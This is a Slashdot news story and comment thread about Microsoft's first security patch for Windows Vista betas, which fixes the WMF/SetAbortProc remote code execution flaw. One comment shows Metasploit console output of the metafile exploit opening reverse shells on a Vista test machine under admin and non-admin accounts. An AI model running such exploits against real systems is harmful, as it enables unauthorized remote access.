First Windows Vista Security Update Released 317
Bard Of Vim writes "Microsoft has issued critical security patches for beta testers running the Windows Vista December CTP (Community Technology Preview) and Windows Vista Beta 1, and warned that the new operating system was vulnerable to a remote code execution flaw in the Graphics Rendering Engine. The Vista patches address the same vulnerability that led to the WMF (Windows Metafile) malware attacks earlier this month. The recent out-of-cycle security update for the WMF vulnerability (see slashdot coverage) makes no mention of Windows Vista being vulnerable, but with the release of this weekend's patches it is clear that the poorly designed 'SetAbortProc,' the function that allows printing jobs to be canceled, was ported over to Vista."
Cant wait... (Score:2, Insightful)
Re:Cant wait... (Score:2, Insightful)
The first one .... (Score:5, Funny)
Sorry, couldn't resist, please ignore...
Re:Cant wait... (Score:5, Informative)
People were telling me you can't automatically exploit it but I fired up metasploit and was successful with the admin account and a non-priv account.
Administrator
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/ [10.1.1.101]
[*] HTTP Client connected from 10.1.1.106:49450, redirecting...
[*] HTTP Client connected from 10.1.1.106:49451, redirecting...
[*] HTTP Client connected from 10.1.1.106:49452, redirecting...
[*] HTTP Client connected from 10.1.1.106:49453, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49454
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\Administrator\Desktop>
Test account
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/ [10.1.1.101]
[*] HTTP Client connected from 10.1.1.106:49487, redirecting...
[*] HTTP Client connected from 10.1.1.106:49488, redirecting...
[*] HTTP Client connected from 10.1.1.106:49489, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49490
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\test\Desktop>
I am wondering what else they are going to import from the old technology. I was a Windows fan up until this WMF dealio. I work in an Information Security office and all of our staff are going to Mac. Ordered them Friday!
Re:Cant wait... (Score:3, Interesting)
I have used Microsoft since Dos 4.0 as well as other operating systems. This is the first time I got nervous just surfing the web. There have always been some kind of workaround. In this case there wasn't a good workaround for the zero day exploits that were all over the place. The crappy workaround M$ recommended wasn't a good workaround at all. If you disabled the crappy dl
Re:Cant wait... (Score:3, Insightful)
Fixing bugs in a pre-beta OS under development is indicative of this? Then a changelog of Linux or OS/X beta will scare you good.
Re:Cant wait... (Score:5, Interesting)
Contrary to popular belief, Vista isn't some big rewrite. It's the same Windows as before with some architectural changes and new API layers. But the old Win32 stuff is still in there.
Wait 'til you guys see the fun way Vista gets older apps to run that expect admin privileges--it emulates a virtual filesystem and all sorts of other crazy things. My impression of Vista is that instead of a clean redesign, it's more layers of updates and APIs on the creaky building. As for WinFX, none of the major apps are going to rewrite their big applications just to go to the slow
I believe there are plenty of reasons to be concerned about Vista. OS X had the advantage of totally starting over and just porting over the old toolbox APIs and calling it Carbon to get older apps to come along. Vista is a weird blend of old cruft and new less-tested code, complete with suspiciously high system requirements. But hey, at least they got shadows on their windows now--I've only been seeing that for five years from Apple.
Re:Cant wait... (Score:3, Insightful)
This is a bug that was found by a third party. Microsoft, with all the effort it is putting into the Vista release, did not find this major vulnerability. The implication is that it is likely more vulnerabilities will be found by third parties, some of them malicious.
And it wasn't audited while porting?! (Score:5, Interesting)
How they think will be migration from old versions of Windows if such things will countinue to happen? Yeah, I know, OEM will have Vista and that's all. But with Web applications my pick is that lot of enterprises will stick with their Windows 2000/XP.
No doubt that Microsoft will have hard time to make Vista as smash hit as they would like it to be.
Re:And it wasn't audited while porting?! (Score:5, Interesting)
What matters is that they don't want to buy a new Dell in order to use... what exactly? Actually, were it not for some games and a slicker GUI, I'd probably stick with 2k, which is still the best Windows made to date. Yeah, holes in RPC and whatnot, but still better than all the other Windowses.
.NET 2 = already available. (Score:2)
Re:.NET 2 = already available. (Score:5, Informative)
WPF: Windows Presentation Framework ("avalon"; using XAML): what WinFX and the new AERO Shell are based onto;
WCF: Windows Communication Foundation ("indigo": an enhancement to Web Services, MSMQ, etc);
WWF: Windows Workflow Foundation, to help take care of scenarios like the one that was asked on "ask.slashdot.org" just yesterday. Something that's becoming increasingly common/important nowadays.
People like to just dismiss Vista like it has nothing new or worthwhile, ignoring all the new stuff that actually IS there, not just the previous 3 things mentionned, but there's a great deal of other changes (video drivers not in kernel mode anymore, new audio and printing (both work quite differently), GUI rendered by the
There are differences. It may not be worthwhile to everyone, but as a programmer I'm looking forward to many of these advances (WCF seems really nice). Saying Vista is about
Re:.NET 2 = already available. (Score:4, Insightful)
Re:And it wasn't audited while porting?! (Score:2)
Re:And it wasn't audited while porting?! (Score:2)
Re:And it wasn't audited while porting?! (Score:3, Insightful)
Vista will appear in the consumer market as the successor to Win MCE, at a time when HDTV, the HTPC and on-line media services are becoming mass-market.
To me, this looks like money in the bank.
Re:And it wasn't audited while porting?! (Score:3, Insightful)
Son, I've been hearing people say that every time Microsoft finally crimps off another length of code into a shrinkwrapped box and calls it an OS since 1995. It was true then (cos Windows NT 3.51 was out...) and it's been true for every turd they've shipped since. And people still keep buying new PCs, which keep on arriving with the current shipping Microsoft OS for that market.
Re:And it wasn't audited while porting?! (Score:3, Insightful)
Eh, they fix a bug in an early beta version and you have a problem with this because?
Re:And it wasn't audited while porting?! (Score:2)
The fact that it was STILL IN THERE more than makes up for it. Trustworthy Computing, what, four years ago, was supposed to involve audits, yet this bug made it in after (at least) two audits - the pre XP one and pre-Vista one.
Re:And it wasn't audited while porting?! (Score:3, Insightful)
It is not how the biggest and "greatest" software company in the world should do their homework.
Re:And it wasn't audited while porting?! (Score:5, Funny)
At least... (Score:5, Insightful)
Re:At least... (Score:2)
Rather, what it indicates is that Microsoft is recycling a bunch of XP code. That's not necessarily a bad thing, especially given the need for backwards compatability. But it means that whenever they find a new XPloit, they'll have to release a Vista patch at the same time. Otherwise, hackers could reverse-engineer the XP patch, and try the same exploit on Vista.
That will be mo
Re:At least... nothing (Score:2)
Frist patch (Score:5, Insightful)
Re:Frist patch (Score:3, Insightful)
What's wrong with this bug is that clearly Microsoft "software quality control" is failed (we know it for a long time - this is just another prove). All code going to Vista should be checked line by line and not cut-n-pasted function by function.
Re:Frist patch (Score:3, Insightful)
Vista by the way should of been a complete ground up rewrite. i would expect no less for taking over 6 years to build. Just look at were KDE, Linux kernel, X where 6 years ago. Hell look at what Apple did with OS X in far less time than MSFT. Every other major OS has under gone massive revisions and upgrades. Hell Apple is working
Re:Frist patch (Score:5, Insightful)
Apple bought an abandoned OS from the 1980s, that uses kernel with code originally written in the late 1970s. On top of that, they bolted a bunch of Toolbox compatibility code dating from the 80s and 90s, and a bunch of *nix stuff which is also 10-20 years old.
So, it somewhat silly that you would argue that MS performs a "complete ground up rewrite", all while advocating MacOS X, which is a complete slut for legacy code.
Re:Frist patch (Score:3, Insightful)
Maybe his argumentation was wrong, but the simple fact is: BSD/Darwin/OS X never needed a rewrite - they work really well to this day, as you can see on Apples all over the globe. Windows' code, however, should have been dumped, printed on toilet paper and nailed to the church door as a bad example at the time Windows ME was released at the very
Re:Frist patch (Score:2)
Backwards compatibility is just fine. all you need to due is install classic mode. it even plays games. What games there were for OS 9.
Re:Frist patch (Score:2)
Re:Frist patch (Score:2)
More to point - Microsoft "let's hack something for version 1.0 and then let's somehow provide workarounds" way of doing things are hitting them back hard time. And that is only and only their fault.
Re:Frist patch (Score:3, Funny)
Re:Frist patch (Score:4, Insightful)
Funny you should mention NeXT. It was easy-to-use, powerful, developer-friendly, and by far the best OS for desktop use.
I use the NeXT to illustrate how Microsoft has set the computer industry back. To this day, MS-Windows still doesn't have the power or ease-of-use of the NeXT. It wasn't until Apple picked up the pieces with OS X that an operating system approached the desktop usability of NeXTStep.
Microsoft set the computer industry back over a decade. So when you talk about how Apple just stole a bunch of old code to make OS X, at least they had the smarts to steal the good code. Microsoft doesn't have access to good code, so they just steal from themselves.
Microsoft: it's like corporate masturbation!
Re:Frist patch (Score:2)
And I'm half-waiting for someone to discover that MacOS X's PICT file format handler has a similar bug. Although OS X security holes are very rarely exploited by the vulgar sorts of script kiddies and spam merchants.
Re:Frist patch (Score:3, Informative)
Mac OS X is derived from a microkernel (Mach) - but it's far from being a microkernel. A microkernel is not supposed to have the whole TCP/IP stack in kernel space. A microkernel is not supposed to implement drivers in kernel space. A microkernel is not supposed to have the filesystem in kernel space. Microkernels were, in fact, invented to get these things out of kernel space and run as userspace, etc. Being a pure microkernel imp
Re:Frist patch (Score:2)
This is doubly true for a proprietary OS, which has to provide a compatiblity layer of some sort to its previous incarnations. It just doesn't make sense to rewrite that l
Re:Frist patch (Score:3, Insightful)
Completely unnecessary. The guts of NT are (and always have been ) quite solid.
i would expect no less for taking over 6 years to build.
It's only been 3 years since the last Windows NT release.
Just look at were KDE, Linux kernel, X where 6 years ago.
It's a lot easier to make large gains when large gains actually need to be made.
Hell look at what Apple did with OS X in far less time than MSFT.
Apple slapped a new display system and virtual
Re:Frist patch (Score:2)
So the Trustworthy Computing initiative means nothing? The security emphasis means nothing.
So long as code is reused, all is OK?
Vista new from ground up? (Score:2)
The fact this old 'vunerability' suddenly crops up makes me wonder if the paranoid are right and this was an intentional back door...
Does anyone else get the feeling... (Score:3, Insightful)
Re:Does anyone else get the feeling... (Score:5, Insightful)
Cheers, Fogger
Re:Does anyone else get the feeling... (Score:2)
So true. It's the maturity curve. The older a piece of code, the longer it has survived, the less likely an error will be found.
But GDI is also a pain in the ass. It was designed long before anyone had a clue that PCs were going to go in the direction they have. I am glad to see it go. But this problem I don't beleive was part of the GDI. SetAbortProc started there and moved
Re:Does anyone else get the feeling... (Score:2)
Not necessarily true. There is only so much patch after patch can do. If the underlying architecture of the system needs to change then applying fix after fix is likely to be very problematic. In these instances, it is more likely that a complete rewrite would be better structured, more secure and more efficient.
Re:Does anyone else get the feeling... (Score:5, Insightful)
And that is exactly what IT customers want. They only way they can keep all those millions of custom programs developed for Windows over the last decades working is by pulling forward legacy code.
Hey look at Apple -- they just introduced machines that do not run any software from as little as 5 years ago. Apple also has nearly zero corporate desktops. Connect the dots. Maybe consumer users running Firefox and iTunes and MSN Messenger want a "all new Windows", but nobody else does.
Re:Does anyone else get the feeling... (Score:4, Informative)
Re:Does anyone else get the feeling... (Score:2)
Re:Does anyone else get the feeling... (Score:2, Funny)
And it's working too; the latest exploit worked fine on Vista!
Re:Does anyone else get the feeling... (Score:2)
One word for you: Rosetta.
Any business will go for what's nice and safe and runs the software they want to use. In most, that's Windows. But in industries like media, suddenly Macs are seen a lot more.
OS9/OS X (Score:2)
Re:Does anyone else get the feeling... (Score:2)
Naive. (Score:2)
How does an obvious statement like this manage to get 4 stupid moderators all to mod it up?
Windows 95! Now better than ever!
Windows 98! All your problems are solved!
Windows ME! We will help you how we can!
Windows 2000! No limit to your dreams!
Windows XP! Easier than ever, better, faster!
Of course MS is going to hype up their new product and have you upgrade from the old product. A statement as naive as yours
Re:Does anyone else get the feeling... (Score:2)
Re:Does anyone else get the feeling... (Score:2)
Gibson is such an Alarmist! Now patch your code! (Score:4, Interesting)
The issue here is I think, that Microsoft continues to this day, to be rather sloppy and secretive about fixing their stuff. So if Gibson makes a big flap, so be it. Better that than a back door that MSFT doesn't bother to fix, because they don't consider it a "critical vulnerability" or some other excuse. As Gibson points out, no question this is highlighting one of the main benefits of open source - the source is there for all to see, no dickering about whether it was intentional or not, it gets fixed. Period.
Re:Gibson is such an Alarmist! Now patch your code (Score:4, Interesting)
Re:Gibson is such an Alarmist! Now patch your code (Score:3, Informative)
Re: (Score:2)
Re: (Score:2)
LOL (Score:2)
At least, we can't complain that they are late with the patches anymore. Interesting tactic actually, to release the patches before the operating system...
About Windows Vista (Score:5, Interesting)
Re:About Windows Vista (Score:3, Insightful)
Re:About Windows Vista (Score:2, Interesting)
If a user can temporarily escalate privileges, so can a program.
As a result, malware installations are reduced and more OS functionality is made safely available to non-administrators.
Translation: The reason so many of your programs must run as administrator right now is a large chunk of the functionality we currently provide demands this.
Security is furthe
more like.. (Score:4, Insightful)
Re:more like.. (Score:3, Informative)
I find it amusing... (Score:4, Interesting)
Like I said once years ago, if edlin were written today, it would have direct access to kernel-level functions through scripting and be a vector for both viruses and remote exploits.
Let's be fair (Score:3, Insightful)
Re:Let's be fair (Score:3, Insightful)
The fact that they've imported decades of legacy Windows code, written for a period of time when security was designed for LAN environments rather than open access to public networks, seems a bit shocking even to people like me who already KNEW THIS.
Sometimes things you already know are newsworthy/shocking after you see them in print or hear them out loud.
Re:Let's be fair (Score:2)
If I understand Vista's security model correctly, IE is sandboxed so that the exploitable avenues from the WMF hole are extremely minimized.
Re:Let's be fair (Score:2)
Microsoft's security model for NT gave more thought to making things convenient for administrators that to making products that would be resilient to outside attacks.
"Perfect" isn't ever an engineering goal. The problem with Windows NT/2000/XP and the legacy imported from Win3.1/95 is not that it "isn't perfect"
Bad code, bad port, bad system (Score:2, Insightful)
I believe it is very likely so. It is time to dump this code and go to a new platform. Whether this is done my microsoft itself or by the many alternatives out there to the Windows operating system.
Re:Bad code, bad port, bad system (Score:2)
However, Microsoft spent years enthusiastically bolting on bits of code without the remotest care for security, in some cases giving the code access to the system at its very lowest levels. What they need to do is what was done with OpenBSD. Stop adding functionality, go back and audit what's already there. Everything. From the ground up.
Thing is, OpenBSD could do this because it didn't have pressures to release a n
Re:Bad code, bad port, bad system (Score:2)
No, the security problems in Windows are so bad that everyone else should dump Windows: Microsoft will never let go until there are no more buyers. Which is mostly what Vista is about. Seems the Yugo buyers have figured out they bought a Yugo, so Microsoft is changing the paint color and advertising it as a Porshe, yet again.
The old addage: There's a sucker born every minute.
SetAbortProc is OK (Score:5, Informative)
SetAbortProc is well designed. The problem is the code that handles the WMF. That code is allowing a payload to be placed on the stack and an incorrect pointer to be sent.
All set abort proc does is send an abort code to the print job and set a call back method to call when the abort completes.
-Rick
Re:SetAbortProc is OK (Score:2)
Re:SetAbortProc is OK (Score:2)
-Rick
Re:SetAbortProc is OK (Score:5, Informative)
I was incorrect in one aspect. SetAbortProc is in the GDI, NOT Win32 library. But it isn't the problem here. The problem is that vulnerbility in the code that parses the record is passing the incorrect call back method pointer to the SetAbortProc method.
-Rick
Re:SetAbortProc is OK (Score:2)
Re:SetAbortProc is OK (Score:2)
-Rick
does it really count if it's still in beta? (Score:3, Insightful)
There's an old saying... (Score:3, Insightful)
"Garbage in, garbage out."
I wonder how much of Vista is actually based on new code. Is Vista going to be Windows XP in Mac OSX's clothing? And is it going to inherit the same piss-poor security it's predecessor had? I certainly hope not.
In case you didn't already know... (Score:2, Informative)
Re: (Score:2)
You mean the BETA is not production ready?!?! (Score:3, Insightful)
Didn't Microsoft say... (Score:3, Informative)
Do I remember wrong ?
Re:Didn't Microsoft say... (Score:2)
Yes.
Re:Didn't Microsoft say... (Score:5, Insightful)
Then, a few years later, pretty much nothing worked, so they tossed out all the 4000-era builds, took a clean copy of Windows 2003 SP1, and built on top of that.
That is Vista. It's built on Server 2003 SP1.
The real deal (Score:3)
Now that the monthly release has passed and people are deploying the updates I wanted to take a moment to discuss some things related to questions we've been receiving on the recent WMF issue. (Which was addressed in MS06-001).
http://blogs.technet.com/msrc/archive/2006/01/13/
Before i replied (Score:3, Informative)
A metafile is a list of commands that can be played back to draw a graphic. Typically, a metafile is made up of commands to draw objects such as lines, polygons and text and commands to control the style of these objects. NOTE: Some people equate metafiles with vector graphics. In most cases this is fine; but, strictly speaking, a metafile can contain any mix of vector and raster graphics. For example, a metafile could contain just one command to display a bitmap! Unless the distinction is important, we will consider a metafile to be a kind of vector graphic.
The reason it was still included is cause it is technically a file format! Do you rewrite everything in linux? Was php totally rewritten from the ground up from php4 to php5 i don't think so.
Just my take on things!
Re:Vista is Yesterday's News (Score:4, Insightful)
Outlook? (Score:3, Funny)
That's funny. Outlook was one of Microsoft's first major security problems.
Re:No firewalls? (Score:2, Informative)
Don't people use firewalls anymore?
Firewalls don't help in this case. The flaw allows attackers to execute code of their choice on a system when the victim views a WMF file (on a website, for example).
Firewall will not help (Score:3, Informative)
I find such a lack of consistency . . . (Score:5, Insightful)
Re:I find such a lack of consistency . . . (Score:4, Insightful)
Sure, linux sometimes has the same kind of updates. But bug disclosement in linux isn't a terrorist activity, kernel versions are named 2.2, 2.4, 2.6 and earns it reputation on the field, not with marketing fluff.
Re:I find such lack of security... (Score:3, Insightful)
This says more about Redhat FC than Microsoft, in this case. Just about weekly there is discovered a new local root vulnerability in the Linux kernel, and having dozens of those in the last year or so does not speak well of Linux security.
Re:I find such lack of security... (Score:4, Informative)
Just about weekly? I beg to differ. Last local root exploit:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE
The one before:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN
How about the one before?
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN
Perhaps you'd like to backup your claim?
Dozens? No. Several? Yes. Dozen? About that. How many would M$ products have if as many eyes analyzed it relentlessly? A metric assload. Take the partial 2k source code for an example.
Re:I find such lack of security... (Score:3, Insightful)
Another thing good sysadmins should do to minimize threats is to chroot all of his daemons as well as not provide them with logon shells and huge 100+ character pwgen'd passwords - effectively negating the vulnerability from a server standpoint.
Those are just two of the things Linux offers us tha
Re:Yeah, right. (Score:2, Offtopic)
XP is way more secure - there's no getting away from it (unless you stick your head in the sand screaming "it ain't it ain't").
The truth is that there is so much further to go.
Next I'll be hearing that XP can't be installed by normal users and doesn't impliment a WIMP interface.
as for Vista - I'm looking forward to using it - my current experience
Re:Out of perportion (Score:2)